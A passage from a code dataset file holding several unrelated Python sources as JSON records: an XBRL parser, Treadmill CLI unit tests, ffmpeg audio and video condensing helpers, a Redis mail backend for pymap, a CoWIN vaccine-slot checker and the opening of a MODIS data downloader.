get_context_tags(self):\n \"\"\"contextタグ取得\"\"\"\n od = OrderedDict()\n\n # contextタグ取得\n for element in self.root.findall('.//%s' % self.xbrli_context):\n # id属性の値を取得\n key_id = element.get('id')\n\n # idは重複しないはず\n assert key_id not in od\n \n # id属性をキーにして辞書を作成\n od.update({key_id: OrderedDict()})\n\n # entityタグ取得\n entity = OrderedDict()\n for (n, et_entity) in enumerate(element.findall('.//%s' % self.xbrli_entity), start=1):\n # entityは通常1つ\n assert n == 1\n\n # identifierタグ取得\n entity.update(self.get_identifier_tags(et_entity))\n od[key_id].update({'entity': entity})\n\n # periodタグ取得\n period = OrderedDict()\n for (n, et_period) in enumerate(element.findall('.//%s' % self.xbrli_period), start=1):\n # periodは通常1つ\n assert n == 1\n\n # startDate, endDate, instantタグ取得\n period.update(self.get_date_tags(et_period))\n od[key_id].update({'period': period})\n \n # scenarioタグ取得\n scenario = OrderedDict()\n for (n, et_scenario) in enumerate(element.findall('.//%s' % self.xbrli_scenario), start=1):\n # scenarioは通常1つ\n assert n == 1\n\n if self.info['会計基準'] == 'jpfr':\n # NonConsolidatedタグ取得\n scenario.update(self.get_non_consolidated_tag(et_scenario))\n od[key_id].update({'scenario': scenario})\n elif self.info['会計基準'] == 'ifrs':\n # explicitMemberタグ取得\n scenario.update(self.get_explicit_member_tags(et_scenario))\n od[key_id].update({'scenario': scenario})\n return od\n\n def get_identifier_tags(self, element):\n \"\"\"identifierタグ取得\"\"\"\n od = OrderedDict()\n for (n, et_identifier) in enumerate(element.findall('.//%s' % self.xbrli_identifier), start=1):\n # identifierは通常1つ\n assert n == 1\n\n for (name, value) in et_identifier.items():\n od.update({name: value})\n od.update({'text': et_identifier.text})\n return od\n\n def get_date_tags(self, element):\n \"\"\"日付タグ取得\"\"\"\n datas = OrderedDict()\n\n et_start_date = element.find('.//%s' % self.xbrli_start_date)\n if et_start_date is not None:\n # 開始日を追加\n od = OrderedDict()\n for (name, value) in et_start_date.items():\n od.update({name: value})\n od.update({'text': et_start_date.text})\n datas.update({'start_date': od})\n\n # 終了日を追加\n et_end_date = element.find('.//%s' % self.xbrli_end_date)\n\n od = OrderedDict()\n for (name, value) in et_end_date.items():\n od.update({name: value})\n od.update({'text': et_end_date.text})\n datas.update({'end_date': od})\n else:\n # 期末日を追加\n et_instant = element.find('.//%s' % self.xbrli_instant)\n\n od = OrderedDict()\n for (name, value) in et_instant.items():\n od.update({name: value})\n od.update({'text': et_instant.text})\n datas.update({'instant': od})\n return datas\n\n def get_non_consolidated_tag(self, element):\n \"\"\"NonConsolidatedタグ取得\"\"\"\n od = OrderedDict()\n for (n, et_non_consolidated) in enumerate(element.findall('.//%s' % self.jpfr_oe_non_consolidated), start=1):\n # NonConsolidatedは通常1つ\n assert n == 1\n\n # \n # タグ名のみ取り出す\n od.update({'tag': et_non_consolidated.tag.rsplit('}', maxsplit=1)[1]})\n return od\n\n def get_explicit_member_tags(self, element):\n \"\"\"explicitMemberタグ取得\"\"\"\n od = OrderedDict()\n for et_explicit_member in element.findall('.//%s' % self.xbrldi_explicit_member):\n key = et_explicit_member.get('dimension')\n\n assert key not in od\n\n od.update({key: et_explicit_member.attrib})\n od[key].update({'text': et_explicit_member.text})\n return od\n\n def get_xbrl_datas(self, namespace):\n \"\"\"データ取得\"\"\"\n datas = OrderedDict()\n for element in self.root.findall('.//{%s}*' % namespace):\n # tag名、contextRef、idのタプルをキーにして辞書を作成\n key = (element.tag, element.get('contextRef'), element.get('id'))\n data = OrderedDict()\n\n # 属性の内容を追加\n data.update(element.attrib)\n\n # テキストも追加\n data.update({'text': element.text})\n\n if key in datas:\n if data == datas[key]:\n # キーも値も同じなのでスキップ\n continue\n else:\n print('キー重複 %s' % str(key))\n\n # リストに追加\n datas.update({key: data})\n return datas\n","sub_path":"XbrlReader/xbrl_jpfr.py","file_name":"xbrl_jpfr.py","file_ext":"py","file_size_in_byte":13807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390806933","text":"\"\"\"Unit test Treadmill CLI.\n\"\"\"\n\nimport unittest\n\nimport click\nimport click.testing\nimport mock\n\nfrom treadmill import context\nfrom treadmill.cli import configure as configure_cli\nfrom treadmill.cli import discovery as discovery_cli\nfrom treadmill.cli import sproc as sproc_cli\nfrom treadmill.cli.admin import blackout as blackout_cli\nfrom treadmill.cli.admin import show as admin_show_cli\nfrom treadmill.cli.admin import scheduler as scheduler_cli\n\nfrom treadmill.sproc import zk2fs as zk2fs_sproc\n\n\ndef check_help(testcase, args):\n \"\"\"Checks help invocation.\"\"\"\n testcase.assertEqual(\n 0,\n testcase.runner.invoke(testcase.cli, args + ['--help']).exit_code,\n )\n\n\nclass TreadmillShowTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill show' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = admin_show_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n check_help(self, ['--cell', '-', 'pending'])\n\n @mock.patch('treadmill.context.ZkContext._resolve', mock.Mock())\n @mock.patch('kazoo.client.KazooClient.get_children', mock.Mock())\n def test_action(self):\n \"\"\"Test show actions.\"\"\"\n self.runner.invoke(\n self.cli, ['--cell', 'foo', 'running'])\n self.assertEqual(context.GLOBAL.cell, 'foo')\n\n\nclass TreadmillSchedulerTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill scheduler' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = scheduler_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n check_help(self, ['--cell', '-', 'view'])\n check_help(self, ['--cell', '-', 'view', 'allocs'])\n check_help(self, ['--cell', '-', 'view', 'servers'])\n check_help(self, ['--cell', '-', 'view', 'apps'])\n check_help(self, ['--cell', '-', 'view', 'queue'])\n\n @mock.patch('treadmill.context.ZkContext._resolve', mock.Mock())\n @mock.patch('kazoo.client.KazooClient.get_children', mock.Mock())\n def test_action(self):\n \"\"\"Test scheduler commands.\"\"\"\n self.runner.invoke(\n self.cli, ['--cell', 'foo', 'view', 'servers'])\n self.assertEqual(context.GLOBAL.cell, 'foo')\n\n\nclass TreadmillBlackoutTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill blackout' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = blackout_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n check_help(self, ['--cell', '-', 'app'])\n check_help(self, ['--cell', '-', 'server'])\n\n\nclass TreadmillConfigureTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = configure_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n\n\nclass TreadmillDiscoveryTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = discovery_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n\n\nclass TreadmillSprocTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = sproc_cli\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [])\n\n def test_args(self):\n \"\"\"Test passing context arguments.\"\"\"\n self.runner.invoke(\n self.cli, ['--cell', 'foo', 'init', '--help'])\n self.assertEqual(context.GLOBAL.cell, 'foo')\n self.runner.invoke(\n self.cli, ['--cell', 'xxx', '--zookeeper', 'bla',\n 'init', '--help'])\n self.assertEqual(context.GLOBAL.cell, 'xxx')\n self.assertEqual(context.GLOBAL.zk.url, 'bla')\n\n\nclass TreadmillZk2FsTest(unittest.TestCase):\n \"\"\"Mock test for 'treadmill configure' CLI\"\"\"\n\n def setUp(self):\n context.GLOBAL.dns_domain = 'xxx.com'\n self.module = zk2fs_sproc\n self.runner = click.testing.CliRunner()\n self.cli = self.module.init()\n\n def test_help(self):\n \"\"\"Test help with no arguments.\"\"\"\n check_help(self, [''])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/treadmill_cli_test.py","file_name":"treadmill_cli_test.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373102241","text":"import ffmpeg\nimport logging\nfrom pathlib import Path\nimport os\nimport tempfile\nimport subprocess\n\n\n# given a stream in the input file, demux the stream and save it into the outfile with some type\ndef ffmpeg_demux(infile: Path, stream_idx: int, outfile: Path):\n # output format is specified via extention on outfile\n logging.debug(f\"demuxing stream {stream_idx} from file {infile} to {outfile}\")\n video = ffmpeg.input(infile)\n stream = video[str(stream_idx)] # don't need 0\n stream = ffmpeg.output(stream, str(outfile))\n stream = ffmpeg.overwrite_output(stream)\n logging.debug(f\"ffmpeg arguments: {ffmpeg.get_args(stream)}\")\n try:\n ffmpeg.run(stream, quiet=logging.getLogger().getEffectiveLevel() >= logging.WARNING) # verbose only\n except ffmpeg.Error as e:\n if e.stderr is None:\n logging.warning(\n f\"Couldn't demux stream {stream_idx} from {infile}, skipping.\")\n return None\n logging.warning(\n f\"Couldn't demux stream {stream_idx} from {infile}, skipping. ffmpeg output: \\n\" + e.stderr.decode(\"utf-8\"))\n return None\n return outfile\n\n\n# from ffmpeg-python _run.py\nclass Error(Exception):\n def __init__(self, cmd, stdout, stderr):\n super(Error, self).__init__(\n '{} error (see stderr output for detail)'.format(cmd)\n )\n self.stdout = stdout\n self.stderr = stderr\n\n\ndef ffmpeg_condense_audio(audiofile, sub_times, outfile=None):\n if outfile is None:\n outfile = \"condensed.flac\"\n # logging.info(f\"saving condensed audio to {outfile}\")\n\n # get samples in audio file\n audio_info = ffmpeg.probe(audiofile, cmd='ffprobe')\n sps = int(\n audio_info['streams'][0]['time_base'].split('/')[1]) # audio samples per second, inverse of sampling frequency\n # samples = audio_info['streams'][0]['duration_ts'] # total samples in audio track\n\n stream = ffmpeg.input(audiofile)\n clips = list()\n for time in sub_times: # times are in milliseconds\n start = int(time[0] * sps / 1000) # convert to sample index\n end = int(time[1] * sps / 1000)\n # use start_pts for sample/millisecond level precision\n clips.append(stream.audio.filter('atrim', start_pts=start, end_pts=end).filter('asetpts', 'PTS-STARTPTS'))\n combined = ffmpeg.concat(*clips, a=1, v=0)\n if os.path.splitext(outfile)[1] == \".mp3\":\n combined = ffmpeg.output(combined, outfile, audio_bitrate='320k') # todo: make this user-settable\n else:\n combined = ffmpeg.output(combined, outfile)\n combined = ffmpeg.overwrite_output(combined)\n logging.debug(f\"ffmpeg arguments: {' '.join(ffmpeg.get_args(combined))}\")\n args = ffmpeg.get_args(combined)\n if len(\"ffmpeg \" + \" \".join(args)) > 32766 and os.name == 'nt':\n logging.warning(\"Arguments passed to ffmpeg exceeds 32767 characters while running on a Windows system. \"\n \"Will try using a temporary file to pass filter_complex arguments to ffmpeg.\")\n idx = args.index(\"-filter_complex\") + 1\n complex_filter = str(args[idx])\n # write complex_filter to a temporary file\n fp = tempfile.NamedTemporaryFile(delete=False) # don't delete b/c can't open file again when it's already open in windows, need to close first\n fp.write(complex_filter.encode(encoding=\"utf-8\"))\n fp.close()\n args[idx] = fp.name\n args[idx - 1] = \"-filter_complex_script\"\n args = [\"ffmpeg\"] + args\n\n # ffmpeg.run(combined, quiet=logging.getLogger().getEffectiveLevel() >= logging.WARNING)\n\n pipe_stdin = False\n pipe_stdout = False\n pipe_stderr = False\n quiet = logging.getLogger().getEffectiveLevel() >= logging.WARNING\n\n stdin_stream = subprocess.PIPE if pipe_stdin else None\n stdout_stream = subprocess.PIPE if pipe_stdout or quiet else None\n stderr_stream = subprocess.PIPE if pipe_stderr or quiet else None\n process = subprocess.Popen(\n args, stdin=stdin_stream, stdout=stdout_stream, stderr=stderr_stream\n )\n out, err = process.communicate(input)\n retcode = process.poll()\n if retcode:\n raise Error('ffmpeg', out, err)\n\n\ndef export_condensed_audio(divided_times, audiofile: Path, outfile=None, use_absolute_numbering=False):\n # outfile is full path with extension\n audiofile = str(audiofile)\n if outfile is not None:\n outfile = str(outfile)\n\n if outfile is None: # no output path given, use audiofile path\n outfile = audiofile\n elif outfile[0] == '.' and outfile[1:].isalnum(): # outfile is just an extension, use audiofile for path\n # extension = outfile\n outfile = os.path.splitext(audiofile)[0] + outfile\n else: # outfile is already full path with extension\n pass\n idx = 0\n for p, partition in enumerate(divided_times):\n if len(partition) == 0:\n continue\n for s, split in enumerate(partition):\n if len(split) == 0:\n continue\n idx += 1\n if use_absolute_numbering: # todo: remove outfile naming from this function\n outfilesplit = os.path.splitext(outfile)[0] + \\\n f\".pt{idx}\" + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n else:\n outfilesplit = os.path.splitext(outfile)[0] + \\\n (f\".p{p + 1}\" if len(divided_times) != 1 else \"\") + \\\n (f\".s{s + 1}\" if len(partition) != 1 else \"\") + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n\n ffmpeg_condense_audio(audiofile=audiofile, sub_times=split, outfile=outfilesplit)\n\n\ndef export_condensed_video(divided_times, audiofile: Path, subfile: Path, videofile: Path, outfile=None,\n use_absolute_numbering=False):\n # outfile is full path with extension\n audiofile = str(audiofile)\n if outfile is not None:\n outfile = str(outfile)\n\n if outfile is None: # no output path given, use audiofile path\n outfile = audiofile\n elif outfile[0] == '.' and outfile[1:].isalnum(): # outfile is just an extension, use audiofile for path\n # extension = outfile\n outfile = os.path.splitext(audiofile)[0] + outfile\n else: # outfile is already full path with extension\n pass\n idx = 0\n for p, partition in enumerate(divided_times):\n if len(partition) == 0:\n continue\n for s, split in enumerate(partition):\n if len(split) == 0:\n continue\n idx += 1\n if use_absolute_numbering:\n outfilesplit = os.path.splitext(outfile)[0] + \\\n f\".pt{idx}\" + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n else:\n outfilesplit = os.path.splitext(outfile)[0] + \\\n (f\".p{p + 1}\" if len(divided_times) != 1 else \"\") + \\\n (f\".s{s + 1}\" if len(partition) != 1 else \"\") + \\\n \".condensed\" + \\\n os.path.splitext(outfile)[1]\n\n ffmpeg_condense_video(audiofile=audiofile, videofile=videofile, subfile=subfile,\n sub_times=split, outfile=outfilesplit)\n\n\ndef trim(input_path, output_path, start=30, end=60):\n input_stream = ffmpeg.input(input_path)\n\n vid = (\n input_stream.video\n .trim(start=start, end=end)\n .setpts('PTS-STARTPTS')\n )\n aud = (\n input_stream.audio\n .filter_('atrim', start=start, end=end)\n .filter_('asetpts', 'PTS-STARTPTS')\n )\n\n joined = ffmpeg.concat(vid, aud, v=1, a=1).node\n output = ffmpeg.output(joined[0], joined[1], output_path)\n output.run()\n\n\ndef ffmpeg_condense_video(audiofile, videofile, subfile, sub_times, outfile):\n logging.info(f\"saving condensed video to {outfile}\")\n\n # get samples in audio file\n audio_info = ffmpeg.probe(audiofile, cmd='ffprobe')\n sps = int(\n audio_info['streams'][0]['time_base'].split('/')[1]) # audio samples per second, inverse of sampling frequency\n # samples = audio_info['streams'][0]['duration_ts'] # total samples in audio track\n\n audiostream = ffmpeg.input(audiofile)\n videostream = ffmpeg.input(videofile)\n vid = videostream.video.filter_multi_output('split')\n # sub = videostream['s'].filter_multi_output('split')\n aud = audiostream.audio.filter_multi_output('asplit')\n\n clips = []\n for idx, time in enumerate(sub_times): # times are in milliseconds\n # start = int(time[0] * sps / 1000) # convert to sample index\n # end = int(time[1] * sps / 1000)\n start = time[0] / 1000\n end = time[1] / 1000\n # use start_pts for sample/millisecond level precision\n\n a = aud[idx].filter('atrim', start=start, end=end).filter('asetpts', expr='PTS-STARTPTS')\n v = vid[idx].trim(start=start, end=end).setpts('PTS-STARTPTS')\n # s = sub[idx].trim(start=start, end=end).setpts('PTS-STARTPTS')\n clips.extend((v, a))\n\n out = ffmpeg.concat(\n *clips,\n v=1,\n a=1\n ).output(outfile)\n # output = ffmpeg.output(joined[0], joined[1], outfile)\n out = ffmpeg.overwrite_output(out)\n logging.debug(f\"ffmpeg arguments: {ffmpeg.get_args(out)}\")\n ffmpeg.run(out, quiet=logging.getLogger().getEffectiveLevel() >= logging.WARNING)\n","sub_path":"subs2cia/ffmpeg_tools.py","file_name":"ffmpeg_tools.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"374440454","text":"\nfrom __future__ import annotations\n\nimport json\nimport uuid\nfrom argparse import ArgumentParser, Namespace\nfrom collections.abc import Awaitable, Callable, Mapping, AsyncIterator\nfrom contextlib import closing, asynccontextmanager, AsyncExitStack\nfrom datetime import datetime\nfrom functools import partial\nfrom secrets import token_bytes\nfrom typing import Any, Optional, Final\n\nfrom aioredis import create_redis, Redis, ConnectionClosedError\nfrom pysasl.creds import AuthenticationCredentials\n\nfrom pymap.bytes import BytesFormat\nfrom pymap.config import BackendCapability, IMAPConfig\nfrom pymap.context import connection_exit\nfrom pymap.exceptions import AuthorizationFailure, IncompatibleData, \\\n NotAllowedError, UserNotFound\nfrom pymap.health import HealthStatus\nfrom pymap.interfaces.backend import BackendInterface\nfrom pymap.interfaces.login import LoginInterface, IdentityInterface\nfrom pymap.interfaces.token import TokensInterface\nfrom pymap.token import AllTokens\nfrom pymap.user import UserMetadata\n\nfrom .cleanup import CleanupTask\nfrom .filter import FilterSet\nfrom .keys import DATA_VERSION, RedisKey, GlobalKeys, CleanupKeys, \\\n NamespaceKeys\nfrom .mailbox import Message, MailboxSet\nfrom ..session import BaseSession\n\n__all__ = ['RedisBackend', 'Config', 'Session']\n\n\nclass RedisBackend(BackendInterface):\n \"\"\"Defines a backend that uses redis data structures for mailbox storage.\n\n \"\"\"\n\n def __init__(self, login: Login, config: Config,\n status: HealthStatus) -> None:\n super().__init__()\n self._login = login\n self._config = config\n self._status = status\n\n @property\n def login(self) -> Login:\n return self._login\n\n @property\n def config(self) -> Config:\n return self._config\n\n @property\n def status(self) -> HealthStatus:\n return self._status\n\n @classmethod\n def add_subparser(cls, name: str, subparsers: Any) -> ArgumentParser:\n parser = subparsers.add_parser(name, help='redis backend')\n parser.add_argument('--address', metavar='URL',\n default='redis://localhost',\n help='the redis server address')\n parser.add_argument('--select', metavar='DB', type=int,\n help='the redis database for mail data')\n parser.add_argument('--separator', metavar='CHAR', default='/',\n help='the redis key segment separator')\n parser.add_argument('--prefix', metavar='VAL', default='/mail',\n help='the mail data key prefix')\n parser.add_argument('--users-prefix', metavar='VAL', default='/users',\n help='the user lookup key prefix')\n parser.add_argument('--users-json', action='store_true',\n help='the user lookup value contains JSON')\n return parser\n\n @classmethod\n async def init(cls, args: Namespace, **overrides: Any) \\\n -> tuple[RedisBackend, Config]:\n config = Config.from_args(args)\n status = HealthStatus()\n connect_redis = partial(cls._connect_redis, config, status)\n login = Login(config, connect_redis)\n return cls(login, config, status), config\n\n @classmethod\n async def _connect_redis(cls, config: Config,\n status: HealthStatus) -> Redis:\n try:\n redis = await create_redis(config.address)\n except (ConnectionClosedError, OSError):\n status.set_unhealthy()\n raise\n else:\n status.set_healthy()\n stack = connection_exit.get()\n stack.enter_context(closing(redis))\n return redis\n\n async def start(self, stack: AsyncExitStack) -> None:\n config = self._config\n global_keys = config._global_keys\n connect_redis = partial(self._connect_redis, config, self._status)\n cleanup_task = CleanupTask(connect_redis, global_keys).start()\n stack.callback(cleanup_task.cancel)\n\n\nclass Config(IMAPConfig):\n \"\"\"The config implementation for the redis backend.\n\n Args:\n args: The command-line arguments.\n address: The redis server address.\n select: The redis database for mail data.\n separator: The redis key segment separator.\n prefix: The prefix for mail data keys.\n users_prefix: The user lookup key prefix.\n users_json: True if the user lookup value contains JSON.\n\n \"\"\"\n\n def __init__(self, args: Namespace, *, address: str, select: Optional[int],\n separator: bytes, prefix: bytes, users_prefix: bytes,\n users_json: bool, **extra: Any) -> None:\n super().__init__(args, admin_key=token_bytes(), **extra)\n self._address = address\n self._select = select\n self._separator = separator\n self._prefix = prefix\n self._users_prefix = users_prefix\n self._users_json = users_json\n\n @property\n def backend_capability(self) -> BackendCapability:\n return BackendCapability(idle=True, object_id=True, multi_append=True)\n\n @property\n def address(self) -> str:\n \"\"\"The redis server address. Defaults to a connection to localhost.\n\n See Also:\n :func:`aioredis.create_connection`\n\n \"\"\"\n return self._address\n\n @property\n def select(self) -> Optional[int]:\n \"\"\"The redis database for mail data. If given, the `SELECT`_ command is\n called after successful user lookup.\n\n .. _SELECT: https://redis.io/commands/select\n\n \"\"\"\n return self._select\n\n @property\n def separator(self) -> bytes:\n \"\"\"The bytestring used to separate segments of composite redis keys.\"\"\"\n return self._separator\n\n @property\n def prefix(self) -> bytes:\n \"\"\"The prefix for mail data keys. This prefix does not apply to\n :attr:`.users_key`.\n\n \"\"\"\n return self._prefix\n\n @property\n def users_prefix(self) -> bytes:\n \"\"\"The prefix for user lookup keys.\"\"\"\n return self._users_prefix\n\n @property\n def users_json(self) -> bool:\n \"\"\"True if the value from the user lookup key contains a JSON object\n with a ``\"password\"`` attribute, instead of a redis hash with a\n ``password`` key.\n\n See Also:\n `redis hashes\n `_\n\n \"\"\"\n return self._users_json\n\n @property\n def _joiner(self) -> BytesFormat:\n return BytesFormat(self.separator)\n\n @property\n def _users_root(self) -> RedisKey:\n return RedisKey(self._joiner, [self.users_prefix], {})\n\n @property\n def _global_keys(self) -> GlobalKeys:\n key = RedisKey(self._joiner, [self.prefix], {})\n return GlobalKeys(key)\n\n @classmethod\n def parse_args(cls, args: Namespace) -> Mapping[str, Any]:\n return {**super().parse_args(args),\n 'address': args.address,\n 'select': args.select,\n 'separator': args.separator.encode('utf-8'),\n 'prefix': args.prefix.encode('utf-8'),\n 'users_prefix': args.users_prefix.encode('utf-8'),\n 'users_json': args.users_json}\n\n\nclass Session(BaseSession[Message]):\n \"\"\"The session implementation for the redis backend.\"\"\"\n\n resource = __name__\n\n def __init__(self, redis: Redis, owner: str, config: Config,\n mailbox_set: MailboxSet, filter_set: FilterSet) -> None:\n super().__init__(owner)\n self._redis = redis\n self._config = config\n self._mailbox_set = mailbox_set\n self._filter_set = filter_set\n\n @property\n def config(self) -> IMAPConfig:\n return self._config\n\n @property\n def mailbox_set(self) -> MailboxSet:\n return self._mailbox_set\n\n @property\n def filter_set(self) -> FilterSet:\n return self._filter_set\n\n\nclass Login(LoginInterface):\n \"\"\"The login implementation for the redis backend.\"\"\"\n\n def __init__(self, config: Config,\n connect_redis: Callable[[], Awaitable[Redis]]) -> None:\n super().__init__()\n self._config = config\n self._connect_redis = connect_redis\n self._tokens = AllTokens()\n\n @property\n def tokens(self) -> TokensInterface:\n return self._tokens\n\n async def authenticate(self, credentials: AuthenticationCredentials) \\\n -> Identity:\n config = self._config\n redis = await self._connect_redis()\n authcid = credentials.authcid\n token_key: Optional[bytes] = None\n role: Optional[str] = None\n if credentials.authcid_type == 'admin-token':\n authcid = credentials.identity\n role = 'admin'\n try:\n authcid_identity = Identity(config, self.tokens, redis, authcid)\n metadata = await authcid_identity.get()\n except UserNotFound:\n metadata = UserMetadata(config)\n if 'key' in metadata.params:\n token_key = bytes.fromhex(metadata.params['key'])\n role = role or metadata.role\n await metadata.check_password(credentials, token_key=token_key)\n if role != 'admin' and authcid != credentials.identity:\n raise AuthorizationFailure()\n return Identity(config, self.tokens, redis, credentials.identity, role)\n\n\nclass Identity(IdentityInterface):\n \"\"\"The identity implementation for the redis backend.\"\"\"\n\n def __init__(self, config: Config, tokens: TokensInterface,\n redis: Redis, name: str, role: str = None) -> None:\n super().__init__()\n self.config: Final = config\n self.tokens: Final = tokens\n self._redis: Optional[Redis] = redis\n self._name = name\n self._role = role\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def redis(self) -> Redis:\n redis = self._redis\n if redis is None:\n # Other methods may not be called after new_session(), since it\n # may have called SELECT on the connection.\n raise RuntimeError()\n return redis\n\n async def new_token(self, *, expiration: datetime = None) -> Optional[str]:\n metadata = await self.get()\n if 'key' not in metadata.params:\n return None\n key = bytes.fromhex(metadata.params['key'])\n return self.tokens.get_login_token(self.name, key)\n\n @asynccontextmanager\n async def new_session(self) -> AsyncIterator[Session]:\n config = self.config\n redis = self.redis\n self._redis = None\n if config.select is not None:\n await redis.select(config.select)\n global_keys = config._global_keys\n namespace = await self._get_namespace(redis, global_keys, self.name)\n ns_keys = NamespaceKeys(global_keys, namespace)\n cl_keys = CleanupKeys(global_keys)\n mailbox_set = MailboxSet(redis, ns_keys, cl_keys)\n filter_set = FilterSet(redis, ns_keys)\n try:\n await mailbox_set.add_mailbox('INBOX')\n except ValueError:\n pass\n yield Session(redis, self.name, config, mailbox_set, filter_set)\n\n async def _get_namespace(self, redis: Redis, global_keys: GlobalKeys,\n user: str) -> bytes:\n user_key = user.encode('utf-8')\n new_namespace = uuid.uuid4().hex.encode('ascii')\n ns_val = b'%d/%b' % (DATA_VERSION, new_namespace)\n multi = redis.multi_exec()\n multi.hsetnx(global_keys.namespaces, user_key, ns_val)\n multi.hget(global_keys.namespaces, user_key)\n _, ns_val = await multi.execute()\n version, namespace = ns_val.split(b'/', 1)\n if int(version) != DATA_VERSION:\n raise IncompatibleData()\n return namespace\n\n async def get(self) -> UserMetadata:\n redis = self.redis\n user_bytes = self.name.encode('utf-8')\n user_key = self.config._users_root.end(user_bytes)\n if self.config.users_json:\n json_data = await redis.get(user_key)\n if json_data is None:\n raise UserNotFound(self.name)\n data_dict = json.loads(json_data)\n else:\n data_dict = await redis.hgetall(user_key, encoding='utf-8')\n if data_dict is None:\n raise UserNotFound(self.name)\n return UserMetadata(self.config, **data_dict)\n\n async def set(self, metadata: UserMetadata) -> None:\n config = self.config\n redis = self.redis\n if self._role != 'admin' and metadata.role:\n raise NotAllowedError('Cannot assign role.')\n user_key = config._users_root.end(self.name.encode('utf-8'))\n user_dict = metadata.to_dict(key=token_bytes().hex())\n if self.config.users_json:\n json_data = json.dumps(user_dict)\n await redis.set(user_key, json_data)\n else:\n multi = redis.multi_exec()\n multi.delete(user_key)\n multi.hmset_dict(user_key, user_dict)\n await multi.execute()\n\n async def delete(self) -> None:\n config = self.config\n user_key = config._users_root.end(self.name.encode('utf-8'))\n if not await self.redis.delete(user_key):\n raise UserNotFound(self.name)\n","sub_path":"pymap/backend/redis/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453020652","text":"\n#Import required library\nimport requests\nfrom datetime import datetime, timedelta\n#import pandas as pd\n\n\n# 14 Days Date\ntoday = datetime.today()\nlist_format = [today + timedelta(days=i) for i in range(14)]\ndates_wk = [i.strftime(\"%d-%m-%Y\") for i in list_format]\n\ndates='30-05-2021'\n\n#Search For\npincode=110092\n\n#URL\nalldist_url = \"https://cdn-api.co-vin.in/api/v2/admin/location/districts/9\"\nbydist_url = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByDistrict?district_id=9&date=28-05-2021\"\n\nbypin_url = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/calendarByPin?pincode={}&date={}\".format(pincode, dates)\n\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'} \nresult = requests.get(bypin_url, headers=header)\n\n\n\ncounter=0\n\nif result.ok:\n response_json = result.json()\n if response_json[\"centers\"]: \n for center in response_json[\"centers\"]:\n for session in center[\"sessions\"]:\n if (session[\"available_capacity\"] > -1 ) : \n print('Pincode: ', center[\"pincode\"])\n print('\\t state_name: ', center[\"state_name\"])\n print('\\t district_name: ', center[\"district_name\"]) \n print(\"\\t Available on:\", session[\"date\"])\n print(\"\\t Age: \", session[\"min_age_limit\"])\n print(\"\\t\", center[\"name\"])\n print(\"\\t\", center[\"block_name\"])\n print(\"\\t Price: \", center[\"fee_type\"])\n print(\"\\t Availablity : \", session[\"available_capacity\"])\n print(\"\\t Dose1 : \", session[\"available_capacity_dose1\"], \", Dose2 : \", session[\"available_capacity_dose2\"])\n # print(\"\\t Dose2 : \", session[\"available_capacity_dose2\"])\n if(session[\"vaccine\"] != ''):\n print(\"\\t Vaccine type: \", session[\"vaccine\"])\n print(\"\\n\")\n counter = counter + 1\nelse:\n print(\"No Response!\")\n \n\n","sub_path":"cowin_checker_sk.py","file_name":"cowin_checker_sk.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357539285","text":"# Based on python2\n\nimport urllib.request as urllib\nimport os\n\n# Example file path : \n# http://222.236.46.45/nfsdb/MODISA/2011/09/01/L2/MYDOCBOX.2011.0901.0413.aqua-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODIST/2011/09/01/L2/MODOCBOX.2011.0901.0235.terra-1.hdf.zip\n# http://222.236.46.45/nfsdb/MODISA/2015/07/11/L2/MYDOCT.2015.0711.0457.aqua-1.hdf.zip\n# 